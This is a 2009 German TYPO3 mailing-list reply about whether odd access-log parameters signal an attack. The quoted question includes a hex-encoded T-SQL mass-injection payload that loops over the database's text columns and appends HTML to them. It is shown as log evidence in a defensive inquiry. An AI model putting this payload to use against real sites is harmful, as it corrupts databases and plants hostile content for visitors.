[TYPO3-german] Wie stelle ich "zuverlässig" fest, ob meine TYPO3-Installation gehacked wurde?
Peter Russ
peter.russ at 4many.net
Mon Mar 9 21:31:31 CET 2009
--- Original Nachricht ---
Absender: Uwe Jakobs ImageCode®
Datum: 09.03.2009 20:55:
> Hallo T3-Gemeinde,
>
> ich hoffe, meine Anfrage entwickelt sich zum Off-Topic, aber ich habe in der
> vergangenen Zeit im access-log meines Apache2 überraschend viele
> Parameter-Anhängsel wie dieses hier entdeckt:
>
> 3BSET%20%40S%3DCAST(0x4445434C415245204054207661726368617228323535292C404320
> 76617263686172283430303029204445434C415245205461626C655F437572736F7220435552
> 534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F
> 626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
> 616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78
> 747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729
> 204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461
> 626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354
> 415455533D302920424547494E20657865632827757064617465205B272B40542B275D207365
> 74205B272B40432B275D3D2727223E3C2F74
>
> Dieser String wird in einem normalen Typo3- GET-Parameter eingebettet
> übergeben.
>
> Nach einer Google-Suche mit exakt diesem Wert kamen als Suchergebnis volle 7
> (!) Seiten mit (hauptsächlich) Typo3-Seiten, die offenbar ja nur gefunden
> werden konnten, weil Typo3 augenscheinlich diese Werte speichert und an den
> GoogleBot übergeben hat (meine Seiten waren gottlob nicht dabei).
>
> Frage 1: Sieht so eine (versuchte) SQL-Injection bei Typo3 aus?
>
> Als regelmäßiger Leser der Security Bulletins und nach den Scherzchen bei
> Schäuble und Schalke hatte ich alle älteren Installationen auf die jeweils
> aktuellen Typo3-Versionen geupdatet; die meisten laufen bei mir unter
> v.4.2.6
>
> Frage 2: Bin ich damit auf der sicheren Seite oder gibts weitere
> Empfehlungen?
Beruhigt das:
http://www.thealders.net/blogs/2008/08/08/sql-injection-attack/
Google kann meines Erachtens mit den %-Zeichen (allen nicht AlfaNums)
nicht richtig umgehen und liefert dann alles Mögliche (im Praktikum hieß
das immer: wer misst, misst Mist oder heute: nicht alles was Google auf
eine Suchanfrage liefertm ist eine Antwort auf die Frage, die gestellt
wurde, sondern das, was Google meint, verstanden zu haben. Google wird
also richtig menschlich ;-)
--
Fiat lux! Docendo discimus.
_____________________________
uon GbR
http://www.uon.li
http://www.xing.com/profile/Peter_Russ
More information about the TYPO3-german
mailing list